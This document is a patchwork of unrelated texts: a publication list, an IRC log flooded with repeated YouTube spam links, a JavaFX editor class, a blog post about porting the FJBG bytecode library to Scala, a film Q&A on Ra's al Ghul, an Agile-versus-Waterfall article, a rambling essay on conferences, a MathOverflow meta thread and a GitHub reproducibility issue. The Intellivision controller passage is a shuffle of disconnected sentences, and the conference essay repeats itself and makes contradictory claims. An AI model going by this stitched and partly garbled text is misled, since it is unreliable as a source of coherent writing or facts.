Zhu, R. and Li, S. (2022). CrossMatch: Cross-Classifier Consistency Regularization for Open-Set Single Domain Generalization.
International Conference on Learning Representations
Rezayi, S., Liu, A., Wu, A., Dhakal, C., Ge, C., Zhen, C., Liu, T., and Li, S. (2022). AgriBERT: Knowledge-Infused Agricultural Language Models for Matching Food and Nutrition. 31st International Joint Conference on Artificial Intelligence
Chu, Z., Rathbun, S., and Li, S. (2022). Learning Infomax and Domain-Independent Representations for Causal Effect Inference with Observational Data. SIAM International Conference on Data Mining
Taujale, R., Zhou, A., Yeung, W., Moremen, K., Li, S., and Kannan, N. (2021). Mapping the glycosyltransferase fold landscape using interpretable deep learning. Nature Communications, 12, 5656
Sheu, H., Chu, Z., Qi, D., and Li, S. (2021). Knowledge-Guided Article Embedding Refinement for Session-based News Recommendation. IEEE Trans. Neural Networks and Learning Systems
Chu, Z., Rathbun, S., and Li, S. (2021). Graph Infomax Adversarial Learning for Treatment Effect Estimation with Networked Observational Data. 27th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining
Zhu, R., Tao, Z., Li, Y., and Li, S. (2021). Automated Graph Learning via Population Based Self-Tuning GCN. 42nd International ACM SIGIR Conference on Research and Development in Information Retrieval
Jiang, X., Zhu, R., Ji, P., and Li, S. (2020). Co-embedding of Nodes and Edges with Graph Neural Networks. IEEE Trans. Pattern Analysis and Machine Intelligence
Li, S., Fu, Y. (2017). Matching on Balanced Nonlinear Representations for Treatment Effects Estimation. 31st Annual Conference on Neural Information Processing Systems
[00:41] <myth0d21> https://www.youtube.com/watch?v=ADn2IJnTRyM [00:57] <No> https://www.youtube.com/watch?v=ADn2IJnTRyM [01:12] <nukedclx21> https://www.youtube.com/watch?v=ADn2IJnTRyM [01:41] <gamma7> https://www.youtube.com/watch?v=ADn2IJnTRyM [01:47] <adamg> https://www.youtube.com/watch?v=ADn2IJnTRyM [02:05] <rosseaux27> https://www.youtube.com/watch?v=ADn2IJnTRyM [04:44] <Affliction4> https://www.youtube.com/watch?v=ADn2IJnTRyM [05:11] <ssbr17> https://www.youtube.com/watch?v=ADn2IJnTRyM [05:55] <Checking> https://www.youtube.com/watch?v=ADn2IJnTRyM [07:12] <change23> https://www.youtube.com/watch?v=ADn2IJnTRyM [08:02] <change> https://www.youtube.com/watch?v=ADn2IJnTRyM [08:21] <ascheel12> https://www.youtube.com/watch?v=ADn2IJnTRyM [08:29] <drh11> https://www.youtube.com/watch?v=ADn2IJnTRyM [09:01] <guardian3> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:05] <hubcaps3> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:12] <dirtyroshi> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:15] <elkalamar4> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:19] <thk127> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:23] <mort25> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:37] <apetresc2> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [09:56] <Death91629> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:10] <CGML7> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:10] <israfel> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:12] <swarfega10> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:17] <Guest7933324> LRH OFFICIAL: We are not 
spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:26] <Meanderthal4> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [10:56] <ecks19> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [11:16] <Humbedooh18> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [11:42] <fydel11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [12:22] <spacemud> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [12:35] <Guest249> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [12:50] <L23512> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [13:00] <ktr28> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [14:06] <funnel22> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [14:18] <avelardi11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [14:40] <drot0> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [14:51] <LewsThanThree11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [15:44] <Xenogenesis26> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [16:03] <shah11> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [16:20] <Guest36969> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [17:07] <nosbig23> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [17:44] <was> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [18:23] <brackets> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [19:53] <Krenair11> LRH OFFICIAL: We are not spamming you | 
https://www.youtube.com/watch?v=_utMUBnl3nk [20:08] <Davnit25> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [20:35] <deedra13> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [20:38] <atomicthumbs29> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [21:19] <emilsp4> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [22:35] <enyc14> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [22:35] <codex2064> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk [22:46] <zeroed> LRH OFFICIAL: We are not spamming you | https://www.youtube.com/watch?v=_utMUBnl3nk
package view;

import javafx.geometry.Dimension2D;
import javafx.geometry.Insets;
import javafx.scene.control.Button;
import javafx.scene.control.TextArea;
import javafx.scene.layout.HBox;
import model.Parser;

/**
 * Lower panel containing the text editor that reads in user text input.
 * @author Callie
 */
public class Editor extends HBox {

    private Button runButton;
    private TextArea textEditor;
    private Parser myParser;
    private SideBar mySidebar;

    public Editor(Parser parser, SideBar sidebar, Dimension2D dimensions) {
        mySidebar = sidebar;
        myParser = parser;
        setPadding(new Insets(dimensions.getWidth() / 89, 0,
                dimensions.getWidth() / 85, dimensions.getWidth() / 89));
        setSpacing(15);
        createTextEditor(dimensions);
        createRunButton();
    }

    // Reads the current text, records it in the history sidebar, and hands it to the parser.
    private void parse() {
        String userText = textEditor.getText();
        textEditor.clear();
        mySidebar.setHistory(userText);
        myParser.parseAndExecute(userText);
    }

    private void createTextEditor(Dimension2D dimensions) {
        textEditor = new TextArea();
        textEditor.setPrefSize(dimensions.getWidth() * .685, dimensions.getHeight() * .095);
        getChildren().add(textEditor);
    }

    private void createRunButton() {
        runButton = new Button("Run");
        runButton.setMaxWidth(Double.MAX_VALUE);
        runButton.setMaxHeight(Double.MAX_VALUE);
        getChildren().add(runButton);
        runButton.setOnMouseClicked(e -> parse());
    }
}
(Warning: I’m half asleep, and this post is somewhere between a brain dump and a rant. Coherency is strictly optional.) So, my latest random personal project has turned into a bit of a debacle. I decided I wanted a Java bytecode manipulation library with a decent Scala API. The options were either “Write my own” or “Write bindings to an existing one”. I chose something of a middle ground: “Port an existing one”. Rather than go for any of the normal big names I went for an obscure little internal library at EPFL called FJBG (Fast Java Bytecode Generator). It’s basically a low-level interface onto the class file format, and I’d used it before for code generation (e.g. for the structural proxies stuff) and found it pretty straightforward. Kind of hard to debug programming errors, but otherwise pretty robust. One slight flaw: no test suite to speak of. But that’s OK, it’s used as part of the compiler backend for scalac, so I assumed it gets relatively well covered by the scalac test suite. And it’s been around for quite a while, so it has had time to stabilise. Should be fine. Anyway, the initial porting process went pretty smoothly. I was frankly astonished at how smoothly, in fact – I basically ran it through jatran, spent about 6 hours fixing compiler errors until I had the bytecode generation code working in Scala and prettified to have nicer method names, etc., and then at the end it took about 10 minutes of bug fixing before it just worked. Not bad. The only slight problem was that the class file parsing code wasn’t working. The trouble was that the code relied on a fairly deeply nested inheritance hierarchy and maintained two constructor hierarchies – one for creating things in memory, one for creating them from a DataInputStream. Because of the way Scala handles constructors, this is essentially impossible to do in Scala.
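To make the constructor problem concrete, here is a rough Java sketch (all names invented, not FJBG's actual API) of the pattern being described: one path builds the object in memory, the other populates the same fields from a DataInputStream. Java happily allows both as constructors; Scala's single primary constructor pushes the stream path into a factory method, as sketched here.

```java
import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.IOException;

// Hypothetical, simplified stand-in for one node of the classfile object
// model. The in-memory path is the primary constructor; the stream path is
// a static factory that parses the same fields and delegates to it.
class ConstantValue {
    final int tag;
    final int value;

    // In-memory construction path.
    ConstantValue(int tag, int value) {
        this.tag = tag;
        this.value = value;
    }

    // Stream-based construction path. In Java this could equally be a
    // second constructor; expressing it as a factory is the shape a Scala
    // port is forced into (typically an apply method on a companion object).
    static ConstantValue read(DataInputStream in) throws IOException {
        int tag = in.readUnsignedByte();
        int value = in.readInt();
        return new ConstantValue(tag, value);
    }
}
```

The factory shape also keeps the invariant-establishing logic in exactly one place (the single constructor), which is the fragility complained about below: with two full constructor hierarchies, every invariant has to be maintained twice.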
I’d never thought this was a problem before, but maintaining two constructor hierarchies seemed to me quite a reasonable thing to want, and I started to have doubts about Scala’s approach to constructors. I still have some, but fewer than I did at first. The thing is, this approach is really fragile. It means that each constructor needs to establish the class’s invariants in different ways – you’ve given yourself twice as many opportunities to screw up. Anyway, after some struggling with approaches I eventually got this ported in a reasonably straightforward way (it took me several times as long as the previous part of the porting). It wasn’t the prettiest code ever, but the mapping onto the original wasn’t bad. So I tried it out on a few simple tests – generate a class file, read it back in again, compare them to make sure you get approximately the same thing. Hm. It didn’t work. How curious. I stared at the implementation for a bit, stared at the original Java, and couldn’t see a difference. So I ran the same test on the original Java, and it broke in the same way. Great. That turned out to be an easy fix – but an easy fix to a problem very definitely caused by the multiple constructor hierarchy. Oh well, it worked now. Next part of the test: write the newly read class file to a file, load it, and try to run it. Oops. It NPEs when I try to write the file. Guess I did something wrong – I wonder why that array is null there. The logic for initialising it looks rather complex; let’s see how the original Java version handles this. So I wrote a simplified test case using the original which took a class file, read it into the in-memory representation, and wrote it out again, and tested it against a random class file. It broke – in a totally different way to the way my version did. It didn’t even manage to read the file (I think the difference here is that this was a class file found in the wild rather than one generated by FJBG).
Tried it on a different, simpler one – specifically the class generated by the obvious HelloWorld.java. That broke too. So at this point I was forced to conclude that the class file reading code in FJBG just didn’t work at all. What the hell? Wasn’t this used in the Scala compiler? Clearly it has to be able to parse class files in order to know what’s available on the classpath to compile against! So, some digging through the compiler source later: scalac doesn’t use FJBG’s class reading code at all. It has its own entirely separate code for that. So this code, which I thought was part of a fairly mature and robust compiler backend, was in fact completely and utterly untested and unused. No wonder it was broken. So, new rule (to many of you, a very old rule): if it’s library code and it’s not tested, it’s broken. An application you can judge by “Does it do the right thing?” to at least get some sense of how not-broken it is. Besides, I only have to use an application, not code against it. But if my code is going to depend on yours, yours had better be tested. I’m usually pretty bad at tests, actually. Applications I’ve written are certainly woefully undertested. SBinary’s tests are… well, adequate. And I don’t really recommend depending on any other libraries I’ve written – they’re all a bit incomplete and half-assed. :-) Hopefully this will teach me to be better. At this point I was already rather upset with FJBG’s object model – too mutable, too many back references. So on top of fixing the reading code I was going to have to fix that. I decided it was time to cut my losses, so I’m going to go back to option 1: write my own. I’ll certainly reuse what I can salvage from the FJBG code (assuming some worries I have about licensing are resolved), but honestly the class file format is pretty easy. The overarching format took me two hours to write a parser for (I did it the same night as discovering that .
The bytecode format for method bodies is harder, but I expect to be able to reuse FJBG code for this bit (and probably write a fair bit of my own). Anyway, hopefully this will turn out to be a good thing and I’ll end up with something much more scalic than a straight port of FJBG would have been. We’ll see. Watch this space to see if anything comes of this, and watch this repo to keep an eye on the code.
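For a flavour of how small that outer parser starts out, here is a rough Java sketch (class and method names invented) of just the fixed leading fields of the class file format: the magic number and the version. Everything after this point, from the constant pool onwards, is where the real work lives.

```java
import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.IOException;

// Minimal sketch of parsing the fixed header of a .class file: the magic
// number 0xCAFEBABE, then the minor and major version numbers. A real
// parser continues from here into the constant pool.
class ClassFileHeader {
    static final int MAGIC = 0xCAFEBABE;

    final int minorVersion;
    final int majorVersion;

    ClassFileHeader(int minorVersion, int majorVersion) {
        this.minorVersion = minorVersion;
        this.majorVersion = majorVersion;
    }

    static ClassFileHeader parse(DataInputStream in) throws IOException {
        int magic = in.readInt();
        if (magic != MAGIC)
            throw new IOException("not a class file, bad magic: " + Integer.toHexString(magic));
        int minor = in.readUnsignedShort();
        int major = in.readUnsignedShort();
        return new ClassFileHeader(minor, major);
    }
}
```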
Was Ra's al Ghul nearly immortal in the Dark Knight trilogy? The character of Ra's al Ghul is considered "nearly immortal" in the DC universe. He is nearly immortal because he can cheat death thanks to the powers of the Lazarus Pit. This allows Ra's al Ghul to possess longevity, rejuvenation and youth-restoration abilities. However, he can still be killed like any mortal. Is there any evidence that Ra's al Ghul was nearly immortal in The Dark Knight trilogy? Congratulations, this question is the winner of the corresponding topic challenge. Well, yes and no. There is no clear evidence that he is or is not nearly immortal. We don't actually see him die at the end of Batman Begins, nor is any kind of Lazarus Pit (or its absence) ever mentioned in the movie. However, there is a strong argument to be made that he is just a normal mortal person like you and me (bar any "normal" kind of better physique, due to extensive training, achievable by any properly trained soldier). The Nolan Batman films go to great lengths to root the whole Batman universe in a somewhat real-life scenario, where all of this could actually happen. There is stuff that at least stretches plausibility, like advanced high-tech gadgetry or the fact of someone even deciding to be such a masked vigilante. But the films themselves, their story and their whole presentation, are much more rooted in the genre of the crime drama than in that of comic superheroes. So, in the same way a Bane powered by some kind of super-soldier serum would be too much for that, a concept of a literal Lazarus Pit might not fit very well there either. However, I deliberately said "literal", because the Nolan films, in their effort to root the ultimately comics-based Batman universe in the world of realistic crime thrillers, go to great lengths to transfer some of the well-known but maybe too weird concepts of the source material from their literal origins into a much more metaphorical meaning. For example, the pit where Bruce Wayne is imprisoned in the last film, and that cures both his physical and psychological issues, could be seen as a reference to the actual Lazarus Pit while still not being as otherworldly. Or Bane's mask, which doesn't pump some weird super-soldier serum into his body, but instead lets him withstand much higher pain levels than normal people by constantly delivering painkillers to him. And one of those instances is the immortality of Ra's al Ghul, which is repeatedly addressed throughout the film series. Just that it's not an actual literal immortality, but rather a metaphorical immortality of Ra's al Ghul's and the League of Shadows' ideas. We repeatedly see his ideology come back for Gotham through Bane or Talia, and Bruce imagines Ra's himself in his ultimate realization in the pit. Realistically, it is only Bruce hallucinating, but symbolically it is Ra's al Ghul coming back from the dead to haunt him. Ra's is very much dead; his legacy might never be. Including the concept of a literal Lazarus Pit bringing his body back from the dead would undermine this whole concept. In fact, this sense of immortality without actually being immortal is addressed in Batman Begins already, when it is revealed that Henri Ducard is Ra's al Ghul himself (rather than the man played by Ken Watanabe, as we previously thought), a mere symbol he made for his ideas, in the same way Bruce created a symbol to inspire Gotham City (and one that ultimately will stay immortal too): Bruce: You're not Ra's al Ghul. I watched him die. Ducard: But is Ra's al Ghul immortal? Are his methods supernatural? Bruce: Or cheap parlor tricks to conceal your true identity, Ra's? Ra's himself (or Bruce's projection of him) even alludes to his different kind of immortality in the pit scene in The Dark Knight Rises: Ra's: Tsk, tsk, tsk. Did you not think I would return, Bruce? Hmm? I told you I was immortal. Bruce: I watched... I watched you die. Ra's: Oh, there are many forms of immortality. Even though we don't see him die, Bruce does say he watched him die; we just didn't see it, for cinematic reasons. If we take Bruce's word, we can conclude he is in fact not immortal. @BlueMoon93 Good point. But then again, I don't think Bruce really saw more than we did (Ra's standing in a train that crashed and exploded seconds later) and is probably just extrapolating as much as we are.
Agile vs. Waterfall

One of the first decisions any software development project faces is the “Which development methodology should we use?” question. This is a topic that gets lots of discussion and often very heated debate! The two most popular methodologies currently in use are Waterfall and Agile. Both are usable and mature methodologies. Having been involved in software development projects for a long time, here are my thoughts on the strengths and weaknesses of each.

The Waterfall Methodology

Waterfall is a linear approach to software development. In this methodology, the sequence of events is something like:

• Gather and document requirements
• Design
• Code and unit test
• Perform system testing
• Perform user acceptance testing (UAT)
• Fix any issues
• Deliver the finished product

In a true Waterfall development project, each of these represents a distinct stage of software development, and each stage generally finishes before the next one can begin. There is also typically a stage gate between each; for example, requirements must be reviewed and approved by the customer before design can begin. There are good things and bad about the Waterfall approach. On the positive side:

• Developers and customers agree on what will be delivered early in the development lifecycle. This makes planning and designing more straightforward.
• Progress is more easily measured, as the full scope of the work is known in advance.
• Throughout the development effort, it’s possible for various members of the team to be involved or to continue with other work, depending on the active phase of the project. For example, business analysts can learn about and document what needs to be done while the developers are working on other projects. Testers can prepare test scripts from requirements documentation while coding is underway.
• Except for reviews, approvals, status meetings, etc., a customer presence is not strictly required after the requirements phase.
• Because design is completed early in the development lifecycle, this approach lends itself to projects where multiple software components must be designed (sometimes in parallel) for integration with external systems.
• Finally, the software can be designed completely and more carefully, based upon a more complete understanding of all software deliverables. This provides a better software design with less likelihood of the “piecemeal effect,” a development phenomenon that can occur as pieces of code are defined and subsequently added to an application where they may or may not fit well.

Here are some issues I have encountered using a pure Waterfall approach:

• One area which almost always falls short is the effectiveness of requirements. Gathering and documenting requirements in a way that is meaningful to a customer is often the most difficult part of software development, in my opinion. Customers are sometimes intimidated by the complexity and level of specification detail required early in the project with this approach. In addition, customers are not always able to visualize an application from a requirements document. Wireframes and mockups can help, but there’s no question that most end users have some difficulty putting these elements together with written requirements to arrive at a good picture of what they will be getting.
• Another potential drawback of pure Waterfall development is the possibility that the customer will be dissatisfied with their delivered software product. As all deliverables are based upon documented requirements, a customer may not see what will be delivered until it’s almost finished. By that time, changes can be difficult (and costly) to implement.

The Agile Methodology

Agile is an iterative, team-based approach to development. This approach emphasizes the rapid delivery of an application with complete functional components.
Rather than creating tasks and schedules, all time is “time-boxed” into phases called “sprints.” Each sprint has a defined duration (usually in weeks) with a running list of deliverables, planned at the start of the sprint. Deliverables are prioritized by business value as determined by the customer. If all planned work for the sprint cannot be completed, work is reprioritized and the information is used for future sprint planning. As work is completed, it can be reviewed and evaluated by the project team and customer, through daily builds and end-of-sprint demos. Agile relies on a very high level of customer involvement throughout the project, but especially during these reviews. Some advantages of the Agile approach are easy to see:

• The customer has frequent and early opportunities to see the work being delivered and to make decisions and changes throughout the development project.
• The customer gains a strong sense of ownership by working extensively and directly with the project team throughout the project.
• If time-to-market for a specific application is a greater concern than releasing a full feature set at initial launch, Agile can more quickly produce a basic version of working software which can be built upon in successive iterations.
• Development is often more user-focused, likely a result of more and frequent direction from the customer.

And, of course, there are some disadvantages:

• The very high degree of customer involvement, while great for the project, may present problems for some customers who simply may not have the time or interest for this type of participation.
• Agile works best when members of the development team are completely dedicated to the project.
• Because Agile focuses on time-boxed delivery and frequent reprioritization, it’s possible that some items set for delivery will not be completed within the allotted timeframe. Additional sprints (beyond those initially planned) may be needed, adding to the project cost.
In addition, customer involvement often leads to additional features being requested throughout the project. Again, this can add to the overall time and cost of the implementation.
• The close working relationships in an Agile project are easiest to manage when the team members are located in the same physical space, which is not always possible. However, there are a variety of ways to handle this issue, such as webcams, collaboration tools, etc.
• The iterative nature of Agile development may lead to frequent refactoring if the full scope of the system is not considered in the initial architecture and design. Without this refactoring, the system can suffer from a reduction in overall quality. This becomes more pronounced in larger-scale implementations, or with systems that include a high level of integration.

Making the Choice Between Agile and Waterfall

So, how do we choose? We consider a number of factors when deciding which methodology to use. These factors are not equally weighted; each should be assessed depending on the individual project and circumstances. Once you have decided which basic methodology to utilise, you can further refine the process to best fit your project goals. Ultimately, although the way in which you do your work is important, delivering a solid and maintainable product that satisfies the customer is what really counts.
There are several advantages to presenting your study at a conference. Students who have presented at conferences report learning a great deal from others’ research, establishing valuable connections through networking, preparing for graduate school, and presenting their work to the public, among other things. A conference is a great way to network with peers working on the same research topic. Participants are able to learn from other researchers who are sharing their work. There is a chance to meet others in the same field and exchange ideas and papers that they have written. It is also a great place to network with colleagues in other fields. Correspondence between researchers at conferences can be very helpful for them as well as for their readers. They may be able to get advice on how they can make improvements or suggestions for new research topics, gain access to manuscripts and reviewers, and possibly even publish their work if they were successful at the conference. These benefits are not limited to academic conferences. There is no set attendance requirement at a conference, and participants may attend the events of their choosing. Broadly, there are two types of conferences: those held as part of an academic program, and those that researchers organize themselves. Academic programs typically have more members than non-academic programs, but both share the same basic goals: to provide opportunities for the exchange of ideas, to inform each other about the latest research developments, and to learn from each other’s work; non-academic programs may simply pursue these goals in different ways.
Non-academic conferences may present an opportunity for researchers to meet new people, discuss research issues, and share ideas and perspectives with each other, as well as with colleagues in other fields. Academic conferences are open to all types of people, including faculty who teach in both undergraduate and graduate schools, students from different departments in one university, alumni from all levels of academia or industry, and others who simply want to meet people outside their field. They are often held on a regular schedule, so participants can attend multiple times per year if they wish. Many academic conferences also feature networking events with guest speakers from different fields such as business communications, neuroscience, and psychology; these are excellent opportunities to network with peers in your field. Non-academic conference organizers often use a variety of methods to ensure that their conference is a safe space for all participants and that there will be no bias or discrimination based on race, gender, sexual orientation, religion, or any other characteristic. Non-academic conferences promote diversity by including a wide range of speakers and exhibitors from different areas of science and technology. They are typically held in the same locations as academic conferences, so attendees can easily meet researchers from all over the world in the same building. The purpose of an academic conference is to promote research and education. It is important for researchers to have a voice in those activities. It is also important for scientists to have access to the information they need in order to pursue their goals with enthusiasm and productivity.
Academic conferences allow researchers to interact with others outside their field who share similar research interests and goals; this may include visiting colleagues at other universities or companies to exchange ideas and perspectives on how research can be improved. They also encourage people within various disciplines, such as computer science or physics, to meet one another, because they share common interests in some aspect of science, technology, or philosophy based on their field of study. Non-academic conferences provide an excellent opportunity to meet people who share important scientific interests but not necessarily your own specialty; this gives you a chance to connect with people who might help you better understand your research.
Tagging Answers? Simple question: should the tagging of a question cover the answers? Suppose I asked a question about a mathematical problem and the answers contained, for example: pointers to literature, algorithms, examples, counterexamples, $\cdots$ Should the tagging of the question be updated to cover what is in the (correct) answers, resp. is it already, or should it be possible to tag answers directly? Just to clarify, is this only about "meta tags" (such as reference-request or counterexamples) or also about tags with actual mathematical content? (For example, are you also asking whether, if after an answer is posted it becomes clear that the question is related to infinitary combinatorics, and in the question the relation to this area is not clear, then the corresponding tag should be added?) @MartinSleziak it is primarily about meta tags, but if the answer exhibits connections to other areas of mathematics, I would also think that adding those tags could be helpful. I will mention that there were some related discussions on other metas (although not primarily about meta tags, if I may use that name). Here are examples from Mathematics Meta and Meta Stack Exchange: Retagging after an answer is given, Should I retag a question with a tag that is based on the answer and not the question? and Should we retag questions with topics proposed in the answers? The meta tags (counter)examples and reference-request sound to me of limited interest: the first is often completely useless (it applies to too many questions); the second at least has the role of saying that the primary intention of the OP is to get references, rather than, say, a proof/construction. So this utility would not extend to indicating that an answer provides a reference. "algorithm" is another matter (whether it should be called a meta tag is questionable). In the case of meta tags, my answer to your question is clearly no: completely useless.
On the other hand, adding a mathematical tag because an answer shows a connection unexpected by the OP (e.g., adding "lo.logic" because one realizes that many people in logic have thought about the question, etc.) has the effect of making the post visible to potentially interested users, and can therefore be a good idea. @YCor contrary to your opinion, I don't believe that meta tags for answers are completely useless if one has the idea of scrutinizing MO for interesting algorithms, examples, counterexamples, etc. Such searches will be more effective if it is possible to tell that the material is in the answers, or that the OP was looking for it. In a nutshell, meta tags on answers would provide search keys for improved database functionality. @ManfredWeis I didn't claim "algorithm" is useless; about it I only said it's not clear that it's a meta tag. Concerning examples/counterexamples (which are essentially equivalent), there are 410+115 questions with such tags… that's probably less than 10% of the number of actual questions asking for an example of something.
The Music Synthesizer is also supported! I mapped the inputs to the following keys. That might be something the author of the adapter can account for in firmware. When pin 8 is grounded, pins 1-4 are the four directions and pin 6 is the left fire button. Not sure why, since the rest all reacted the way they should. Are you using Intellivision 1 controllers? New games, collections, gadgets and more. ReVival Retro Magazine: ReVival is the only European magazine totally devoted to alternative consoles since 1997. Click the Add to Cart button below. Additionally, Nostalgia also runs homebrew games that have been created over the years by Intellivision enthusiasts. But how many bits are returned, 8? Speaking of emulators, what are the popular ones for Intellivision? This setup is for navigation of the EmulationStation and RetroPie software only, and has nothing to do with the controls used in game play. Once removed, you can then insert the connector either way to get the wires in the correct order. When I go into the Input Editor, it only seems to accept mapping from the keyboard for the various Colecovision controller functions. This site focuses on the Intellivision and Colecovision. Last tests, I guess, need to be on EmulationStation. Range: -127 to 127; 0 is center. You will need the Inty 1 dongles. Does it remind you of Gray code? Solved various minor bugs and updated manual. Just learned of the Bliss-Box today. One thing that could be an issue: my Arduino files are in several locations on my hard drive. I've found some documentation on how the Coleco controllers work and sent him the links. I think I saw them posted for download on a retro site. K0 - triggers B15 and B23. Imagic Wing War prototype box: a perfect replica of the lost Wing War prototype box from Imagic, Intellivision version. They made interfacing to the Intellivision controller easy to understand and saved me the time of having to figure it out for myself.
Besides, I was sure the controller would be just fine with only three out of four screws. I am using a set of original controllers to develop with. Did it send key presses for all of the Coleco controller functions? To get around this, the key on the dongle can be easily pried off with a small screwdriver or the tip of a knife blade. What are the popular emulators for Colecovision that I should look at? I wanted to try running an Intellivision emulator on the PC; what are people using for controls? I think this is better than using key presses for everything, as the emulator would not be able to tell which controller a key came from, and it seems like that would be a problem in a two-player game. And memory limit detection for variables. I've emailed him twice over the last month to see if I could commission him to build and sell one. Be sure to contact me with your results! What I would like to see as an adapter is one that would allow me to use any Atari-style joystick in the Intellivision console. Works with removable controllers from Intellivision systems such as the Intellivision 2. Now I just have to dig up some controllers. The main loop will read the state of all input pins in both the Keypad and Controller modes as many times as possible within a frame. Yeah, I guess it was a dragon without wings; to me it looked like a bear. It took 2 shots to kill. The only game I have tried it on is Turbo, which granted is designed for a different controller, but nevertheless I have to spin the spinner a lot. I have taken the time to create a section to detail my findings. I have tested it with the Arduino Leonardo and Arduino Micro. I will get such a kick out of playing my old Atari 800 and Atari 2600 games on an emulator, on my Vista laptop, with an actual Atari joystick. After testing for about 10 seconds I found the issue. As usual, everything is open source, so you'll find schematics and source code on this page. All reaction times seemed normal.
Out of the box, the Arduino Leonardo and the Arduino Micro appear to the host computer as a generic keyboard and mouse. There are no emulators that natively support the Colecovision spinner. K2 - triggers B6 and B21. Button 1 seems completely unassigned. K9 - triggers B13 and B17. The only thing left to figure out is covering the back hole where the wires were originally sticking out of the controller. Thanks a million - - - Bob Z. I then deleted the keyboard settings for player 2, since they were crossing each other up. Thanks; as far as I know, Raphnet is the only option. Use in your word processor! Do the Sears controllers come with the straight cord instead of the curly one? Range: -127 to 127; 0 is center. Using Autosense Mode: Autosense Mode supports all. Please note, however, that the procedures above have worked in my case without any damage or problems. Hopefully this will get fixed in a future version.
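On the "does it remind you of Gray code?" aside: in a Gray code, adjacent values differ in exactly one bit, which is why it suits position encoders like a rotating direction disc; the reading never passes through a spurious intermediate value as it moves one step. Here is a generic sketch of the standard binary-reflected Gray code (the textbook construction, not necessarily the console's exact wiring, which I have not verified):

```java
// Standard binary-reflected Gray code: encode with one XOR, decode by
// folding the shifted value back in until it is exhausted.
class GrayCode {
    // Binary -> Gray: adjacent inputs map to codes differing in one bit.
    static int toGray(int n) {
        return n ^ (n >>> 1);
    }

    // Gray -> binary: XOR together all right-shifts of the code.
    static int fromGray(int g) {
        int n = 0;
        for (; g != 0; g >>>= 1) n ^= g;
        return n;
    }
}
```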
Cannot reproduce the results in Figure 4

Hi, thank you for the nice work! I am trying to reproduce the STARmap simulation results of Figure 4, but the RCTD results I obtained are slightly different from what you shared in the folder FigureData/Figure4/Dataset10_STARmap/Result_STARmap/RCTD_result.txt. Specifically, I am using the following datasets as the input data:

Spatial count: FigureData/Figure4/Dataset10_STARmap/Simulated_STARmap/combined_spatial_count.txt
scRNA-seq reference: from the DataUpload.zip file in the shared Google Drive: DataUpload/Dataset10/scRNA_count.txt
scRNA-seq reference annotation: FigureData/Figure4/Dataset10_STARmap/Rawdata/starmap_sc_rna_celltype.tsv

Am I using the correct input files, as you used for the STARmap experiments in Figure 4? Or did you do further preprocessing before using them as inputs for deconvolution? I tried to follow BLAST_CelltypeDeconvolution.ipynb as well, but there it is mentioned that for SpatialDWLS, RCTD, Seurat and SPOTlight the input is a .h5seurat file, which I cannot find. For further details, I used the above-mentioned files as input for RCTD with default parameters; comparing the results I got with the shared RCTD_result.txt, the mean differences across cell types are listed below:

Astro: 0.008530383
Endo: 0.013151105
Excitatory.L2.3: 0.033019338
Excitatory.L4: 0.040755041
Excitatory.L5: 0.037881955
Excitatory.L6: 0.058106645
Inhibitory.Other: 0.048388479
Inhibitory.Pvalb: 0.050582087
Inhibitory.Sst: 0.072285689
Inhibitory.Vip: 0.017592593
Micro: 0.006866524
Neuron.Other: 0.012171693
Olig: 0.019501107
Other: 0.009123502
Smc: 0.004113764

